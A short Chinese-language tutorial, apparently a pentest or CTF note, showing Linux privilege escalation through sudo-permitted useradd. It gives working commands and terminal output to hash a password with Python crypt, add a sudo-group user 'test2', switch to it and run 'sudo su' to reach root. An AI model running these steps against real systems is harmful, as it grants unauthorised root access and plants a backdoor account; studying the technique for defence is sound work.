sudo配合useradd命令也是可以用来提权的。整体思路是添加一个组为sudo的用户,然后用这个新用户执行sudo su到root
首先看下useradd添加用户的几个必要条件,指定组,指定密码,useradd有这么几个参数可以使用
Usage: useradd [options] LOGIN useradd -D useradd -D [options] Options: -g, --gid GROUP name or ID of the primary group of the new account -m, --create-home create the user's home directory -p, --password PASSWORD encrypted password of the new account
-g指定组,-m指定home目录,登录需要一个默认的home目录。-p指定密码,这里的密码需要encrypted加密过。
步骤一:生成用户密码的密文,这里用python的crypt库来实现,这里123456是密码,hh随便指定,相当于盐
test@test:/etc/ppp$ python Python 2.7.16 (default, Oct 10 2019, 22:02:15) [GCC 8.3.0] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import crypt import crypt >>> crypt.crypt("123456","hh") crypt.crypt("123456","hh") 'hhYwUmQRSuCZ.' >>> exit exit Use exit() or Ctrl-D (i.e. EOF) to exit >>> exit() exit() test@test:/etc/ppp$
步骤二:利用上面生成的密码密文配合sudo useradd加一个拥有sudo组的用户,此时就添加了一个test2的用户,密码是123456
test@test:/etc/ppp$ sudo /usr/sbin/useradd -m -g sudo -p hhYwUmQRSuCZ. test2
步骤三:跳到test2用户
test@test:/etc/ppp$ su test2 su test2 Password: 123456 $ id id uid=1003(test2) gid=27(sudo) groups=27(sudo)
步骤四:跳到root用户
$ sudo su sudo su We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for test2: 123456 root@test:/etc/ppp#
提权到root